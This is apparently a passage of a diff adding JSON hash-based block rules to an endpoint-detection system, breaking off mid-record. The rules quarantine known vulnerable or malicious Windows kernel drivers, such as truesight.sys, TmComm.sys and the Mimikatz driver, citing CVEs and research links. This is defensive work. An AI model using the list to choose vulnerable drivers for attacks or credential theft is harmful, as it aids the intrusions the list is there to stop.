"id": 
"3a7162fa-e102-56de-a25c-5d16f2a4469c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142646Z", + "creation_date": "2026-03-23T11:45:31.142648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13241f289d7485b2ff12636ea372ebc6a3f74f427a1d98edf300d6d03b7ad177", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a7ace89-fdd3-579e-b0c6-e6bccbe1c4b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973889Z", + "creation_date": "2026-03-23T11:45:29.973891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.973896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a903f329b70f0078197cb7683aae1bb432eaf58572fe572f7cb4bc2080042d7e", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a8d6678-3710-5568-b5d2-1ab9a24c45dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829096Z", + "creation_date": "2026-03-23T11:45:31.829099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "857a12a70625608a37404e85476180042c5be465ac7d7ba9ed6b126995182218", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a8fd3b6-87a5-56ec-89d3-33148e7f16f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825106Z", + "creation_date": "2026-03-23T11:45:31.825110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c55e8ca84c630170f790b8f9046f7cc555819aa0aa82728986d50cb5be5bd671", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a91bd9d-f542-53e0-b2a2-d05f717967f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971069Z", + "creation_date": "2026-03-23T11:45:29.971073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "3afd07a7775c13bf147b3ea25fd8fde7cce51bab90753b5af44dc2945d64d699", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a97ea3f-c467-5e68-9cc8-95d7d25bc220", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977961Z", + "creation_date": "2026-03-23T11:45:29.977963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae5cc99f3c61c86c7624b064fd188262e0160645c1676d231516bf4e716a22d3", + "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a982bd1-a4e9-5184-a840-8443a45600b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819704Z", + "creation_date": "2026-03-23T11:45:31.819707Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1409728d31fe9f8921a9380dd206ab61688c3a67c5b508bf5bbecf4b93bd5c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a985471-8966-5069-b6bb-bbb46f191caa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982236Z", + "creation_date": "2026-03-23T11:45:29.982238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982243Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a91d6e83b8fdec536580f6617f10dfc64eedf14ead29a6a644eb154426622ba", + "comment": "Vulnerable Kernel Driver (aka KfeCo11X64.sys) [https://www.loldrivers.io/drivers/76b5dfae-b384-45ce-8646-b2eec6b76a1e/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3aa1e839-aa57-533a-979d-c2180e1a2456", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824543Z", + "creation_date": "2026-03-23T11:45:31.824546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c265291f7d561017b9c60e372e5f8e4e1ccf0009d288776b3e21084d3c392798", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ac571cf-513e-5a91-b099-3177cc7754e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146341Z", + "creation_date": "2026-03-23T11:45:32.146344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a282ba45dd3727203ba40cc8f5f79167bb2d461fe294a49557f4667db1e05658", + "comment": "Malicious Kernel Driver (aka driver_bfcbc010.sys) [https://www.loldrivers.io/drivers/dbfcce10-76a3-44a4-a9b8-d7126152a235/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ad8e293-1a23-5378-abdb-b81ddb0a03a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485163Z", + "creation_date": "2026-03-23T11:45:31.485166Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cee8e34dbc221dbb841c0f89db36e70625cebcb4002058aa0af2d34d7ac6b74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ae472ba-a480-59b5-bf71-ae3a3880b73e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609980Z", + "creation_date": "2026-03-23T11:45:29.609982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34f36a59ecf6174eeac15994e54c41fe1e3e3b1eee8ed4c399ec8c63212373d7", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3afbd620-96f2-5039-b74a-5a8f9b49e012", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615832Z", + "creation_date": "2026-03-23T11:45:29.615834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c22b7f65de948fdb74ffc3b5bae68f109bf7404a154ddbfa25dfd53e1bde667", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b03c9d7-2107-5d87-a0e3-acaa6792a378", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831802Z", + "creation_date": "2026-03-23T11:45:30.831804Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e99507bfbaf16bc39a59e570226a898b26e2a9ce276c0a79aa4a65e7f6e2b17", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b0a2646-a464-5600-9e91-ce5383bedd98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822547Z", + "creation_date": "2026-03-23T11:45:30.822549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00b3ac33836f15ea53e81746ffa7c2888dc3c98492b59a97ba5a0a64166900d0", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b143314-d580-56ca-bb65-5ec525d04cca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815041Z", + "creation_date": "2026-03-23T11:45:31.815045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6925affc3b3e3bcdc1cc92d1f816a613be9de35e28db36d4cce9481f28dbbca1", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b2caa4d-43b4-5e0e-9ef5-37bc41817998", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816416Z", + "creation_date": "2026-03-23T11:45:30.816418Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "458efd66c94cd83cbd190d72c329b6c0cec3387802db8ca3cd530a84f80ce2b8", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b3f2274-1436-5f86-9479-60c508fb399a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.481767Z", + "creation_date": "2026-03-23T11:45:30.481769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c33314792854eef6c6cc4bd1cc4b00f1feed35e8bd260dd4ab0d93b1f6165af", + "comment": "Vulnerable Kernel Driver (aka cg6kwin2k.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b438020-6411-5c7b-8fa8-c8609f04a31d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148277Z", + "creation_date": "2026-03-23T11:45:31.148279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "157e7334c5e7655ae0c107bfde777aa5d6b0c3176f97f2994761993d418814f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "3b47fca2-2199-5fbf-99f4-aefd677d2164", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812240Z", + "creation_date": "2026-03-23T11:45:31.812242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3fc5a4b5ef0e979b1d16e4f6a2a766edfd1b9e80228bc0892db3f9e6adffc96e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b4c9874-7466-54ff-bb27-3320f948a34f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146564Z", + "creation_date": "2026-03-23T11:45:32.146566Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6deeea6607a7da9c8b4087d1424aac6dbbe70831e93c835b5a9e4a80ae59f28", + "comment": "Malicious Kernel Driver (aka driver_a6deeea6.sys) [https://www.loldrivers.io/drivers/f694c0e1-b75d-4c41-acbd-a87b72d8abe4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b4dcfa9-d9ae-5aa1-8fcc-ff0fe841a1df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604355Z", + "creation_date": "2026-03-23T11:45:29.604357Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b5495be-6a61-5fd4-b71b-4e4cd3e53830", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622616Z", + "creation_date": "2026-03-23T11:45:29.622618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31f4140c12ac31f5729a8de4dc051d3acd07783564604df831a2a6722c979192", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b5620ad-f93a-5301-8f1f-e37ccbc282f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152686Z", + "creation_date": "2026-03-23T11:45:31.152688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0d2e499e573f90ae279f381b952ff76b6d43ac34855946e2a0a79bdbd4ae2165", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3b5d14c4-80a1-557e-a4ac-c69502851596", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147165Z", + "creation_date": "2026-03-23T11:45:31.147167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 